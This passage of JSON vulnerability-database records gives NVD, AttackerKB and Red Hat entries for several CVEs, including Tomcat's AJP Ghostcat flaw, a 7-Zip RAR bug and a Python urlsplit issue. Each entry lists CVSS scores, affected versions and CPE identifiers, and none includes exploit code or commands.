"cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:hospitality_cruise_fleet_management:9.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:7.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_translational_research:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:15.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:utilities_mobile_workforce_management:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_invoice_matching:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_reconciliation_framework:8.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_sales_audit:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:endeca_information_discovery_studio:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_foundation:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_operations_monitor:3.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_unifier:17.12:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-23T00:24:32", "description": "The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.", "edition": 17, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-16T16:29:00", "title": "CVE-2018-8014", "type": "cve", "cwe": ["CWE-1188"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:netapp:oncommand_workflow_automation:-", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/a:netapp:oncommand_unified_manager:*", "cpe:/a:apache:tomcat:9.0.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:apache:tomcat:8.5.31", "cpe:/a:apache:tomcat:8.0.0", "cpe:/a:netapp:snapcenter_server:-", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/a:apache:tomcat:7.0.88", "cpe:/a:netapp:oncommand_insight:-", "cpe:/a:netapp:storage_automation_store:-", "cpe:/a:apache:tomcat:9.0.8", "cpe:/a:apache:tomcat:8.0.52", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2018-8014", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8014", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:snapcenter_server:-:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.88:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m1:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager:*:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:a:netapp:storage_automation_store:-:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.52:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.31:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-04-23T00:24:10", "description": "Incorrect initialization logic of RAR decoder objects in 7-Zip 18.03 and before can lead to usage of uninitialized memory, allowing remote attackers to cause a denial of service (segmentation fault) or execute arbitrary code via a crafted RAR archive.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-02T21:29:00", "title": "CVE-2018-10115", "type": "cve", "cwe": ["CWE-665", "CWE-908"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10115"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:7-zip:7-zip:18.03"], "id": "CVE-2018-10115", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10115", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:7-zip:7-zip:18.03:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-22T23:28:19", "description": "Unspecified vulnerability in the Application Express component in Oracle Database Server 4.0 and 4.1 allows remote attackers to affect integrity via unknown vectors.", "edition": 5, "cvss3": {}, "published": "2012-05-03T22:55:00", "title": "CVE-2012-1708", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1708"], "modified": "2017-09-09T01:29:00", "cpe": ["cpe:/a:oracle:database_server:4.0", "cpe:/a:oracle:database_server:4.1"], "id": "CVE-2012-1708", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1708", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:oracle:database_server:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_server:4.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-05-25T08:50:49", "description": "IBM Planning Analytics Local 2.0 connects to a Redis server. The Redis server, an in-memory data structure store, running on the remote host is not protected by password authentication. A remote attacker can exploit this to gain unauthorized access to the server. IBM X-Force ID: 186401.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2021-05-17T17:15:00", "title": "CVE-2020-4670", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-4670"], "modified": "2021-05-24T15:10:00", "cpe": ["cpe:/a:ibm:planning_analytics_cloud:2.0.0", "cpe:/a:ibm:planning_analytics_local:2.0.0"], "id": "CVE-2020-4670", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-4670", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:ibm:planning_analytics_local:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:planning_analytics_cloud:2.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-23T00:45:31", "description": "Python 2.7.x through 2.7.16 and 3.x through 3.7.2 is affected by: Improper Handling of Unicode Encoding (with an incorrect netloc) during NFKC normalization. The impact is: Information disclosure (credentials, cookies, etc. that are cached against a given hostname). The components are: urllib.parse.urlsplit, urllib.parse.urlparse. The attack vector is: A specially crafted URL could be incorrectly parsed to locate cookies or authentication data and send that information to a different host than when parsed correctly. This is fixed in: v2.7.17, v2.7.17rc1, v2.7.18, v2.7.18rc1; v3.5.10, v3.5.10rc1, v3.5.7, v3.5.8, v3.5.8rc1, v3.5.8rc2, v3.5.9; v3.6.10, v3.6.10rc1, v3.6.11, v3.6.11rc1, v3.6.12, v3.6.9, v3.6.9rc1; v3.7.3, v3.7.3rc1, v3.7.4, v3.7.4rc1, v3.7.4rc2, v3.7.5, v3.7.5rc1, v3.7.6, v3.7.6rc1, v3.7.7, v3.7.7rc1, v3.7.8, v3.7.8rc1, v3.7.9.", "edition": 33, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-03-08T21:29:00", "title": "CVE-2019-9636", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9636"], "modified": "2020-10-29T14:15:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:opensuse:leap:15.0", "cpe:/o:redhat:enterprise_linux:6.5", "cpe:/o:fedoraproject:fedora:29", "cpe:/o:fedoraproject:fedora:30", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/a:python:python:3.7.2", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/a:python:python:2.7.16", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:fedoraproject:fedora:28"], "id": "CVE-2019-9636", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-9636", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.16:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:28:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.5:*:*:*:*:*:*:*"]}, {"lastseen": "2021-07-22T08:54:29", "description": "When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.", "edition": 41, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-24T22:15:00", "title": "CVE-2020-1938", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1938"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/a:apache:tomcat:7.0.99", "cpe:/a:apache:tomcat:8.5.50", "cpe:/a:apache:tomcat:9.0.30"], "id": "CVE-2020-1938", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1938", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:tomcat:9.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.99:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.50:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-07-20T20:08:50", "description": "jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.\n\n \n**Recent assessments:** \n \n**ze3ter** at July 13, 2021 1:47pm UTC reported:\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 2\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2018-01-18T00:00:00", "type": "attackerkb", "title": "CVE-2015-9251", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9251"], "modified": "2020-07-15T00:00:00", "id": "AKB:4A2FD572-63FD-426B-8D34-A9914260EF72", "href": "https://attackerkb.com/topics/rKQbM0vbSU/cve-2015-9251", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-20T20:17:25", "description": "When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: \u2013 returning arbitrary files from anywhere in the web application \u2013 processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.\n\n \n**Recent assessments:** \n \n**kevthehermit** at February 22, 2020 12:16am UTC reported:\n\nCurrent PoC\u2019s offer unauthenticated LFI inside the webroot. \nDepending on the application and organisations configuration this could reveal sensitive information from database config or other configurations within the source code.\n\nThere is the potential for RFI / RCE although example of this are not yet public.\n\nWith a shift towards containers like Kubernetes / Docker it is important to note that older tags which may be version pinned by organisations are unlikely to be patched.\n\nThe official containers distributed by Apache include tags for vulnerable version although they do not appear to server port 8009 by default. A custom server.xml is required. This is \u201cLikely\u201d to happen.\n\n**busterb** at February 24, 2020 5:15pm UTC reported:\n\nCurrent PoC\u2019s offer unauthenticated LFI inside the webroot. \nDepending on the application and organisations configuration this could reveal sensitive information from database config or other configurations within the source code.\n\nThere is the potential for RFI / RCE although example of this are not yet public.\n\nWith a shift towards containers like Kubernetes / Docker it is important to note that older tags which may be version pinned by organisations are unlikely to be patched.\n\nThe official containers distributed by Apache include tags for vulnerable version although they do not appear to server port 8009 by default. A custom server.xml is required. This is \u201cLikely\u201d to happen.\n\n**theguly** at March 04, 2020 3:54pm UTC reported:\n\nCurrent PoC\u2019s offer unauthenticated LFI inside the webroot. \nDepending on the application and organisations configuration this could reveal sensitive information from database config or other configurations within the source code.\n\nThere is the potential for RFI / RCE although example of this are not yet public.\n\nWith a shift towards containers like Kubernetes / Docker it is important to note that older tags which may be version pinned by organisations are unlikely to be patched.\n\nThe official containers distributed by Apache include tags for vulnerable version although they do not appear to server port 8009 by default. A custom server.xml is required. This is \u201cLikely\u201d to happen.\n\n**wvu-r7** at February 21, 2020 10:38pm UTC reported:\n\nCurrent PoC\u2019s offer unauthenticated LFI inside the webroot. \nDepending on the application and organisations configuration this could reveal sensitive information from database config or other configurations within the source code.\n\nThere is the potential for RFI / RCE although example of this are not yet public.\n\nWith a shift towards containers like Kubernetes / Docker it is important to note that older tags which may be version pinned by organisations are unlikely to be patched.\n\nThe official containers distributed by Apache include tags for vulnerable version although they do not appear to server port 8009 by default. A custom server.xml is required. This is \u201cLikely\u201d to happen.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-24T00:00:00", "type": "attackerkb", "title": "CVE-2020-1938", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11996", "CVE-2020-1938", "CVE-2020-8840"], "modified": "2020-08-31T00:00:00", "id": "AKB:8AA21692-1900-4944-98AB-BEC257302198", "href": "https://attackerkb.com/topics/2P2eGVS0Ex/cve-2020-1938", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2021-05-07T17:36:02", "bulletinFamily": "info", "cvelist": ["CVE-2018-8014"], "description": "The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable &#x27;supportsCredentials&#x27; for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.\n", "modified": "2021-03-21T00:09:26", "published": "2020-04-06T17:04:57", "id": "RH:CVE-2018-8014", "href": "https://access.redhat.com/security/cve/CVE-2018-8014", "type": "redhatcve", "title": "CVE-2018-8014", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-29T10:34:56", "description": "Incorrect initialization logic of RAR decoder objects in 7-Zip 18.03 and before can lead to usage of uninitialized memory, allowing remote attackers to cause a denial of service (segmentation fault) or execute arbitrary code via a crafted RAR archive.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-05-14T12:21:41", "type": "redhatcve", "title": "CVE-2018-10115", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10115"], "modified": "2020-08-17T20:27:01", "id": "RH:CVE-2018-10115", "href": "https://access.redhat.com/security/cve/cve-2018-10115", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-29T04:40:43", "description": "CVE-2020-1938 is a file read/inclusion vulnerability in the AJP connector in Apache Tomcat. This is enabled by default with a default configuration port of 8009. A remote, unauthenticated attacker could exploit this vulnerability to read web application files from a vulnerable server. In instances where the vulnerable server allows file uploads, an attacker could upload malicious JavaServer Pages (JSP) code within a variety of file types and trigger this vulnerability to gain remote code execution (RCE).\n#### Mitigation\n\nPlease refer to the Red Hat knowledgebase article: <https://access.redhat.com/solutions/4851251> \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-24T06:10:47", "type": "redhatcve", "title": "CVE-2020-1938", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1745", "CVE-2020-1938"], "modified": "2021-05-30T07:00:19", "id": "RH:CVE-2020-1938", "href": "https://access.redhat.com/security/cve/cve-2020-1938", "cvss": {"score": 7.5, "vector": 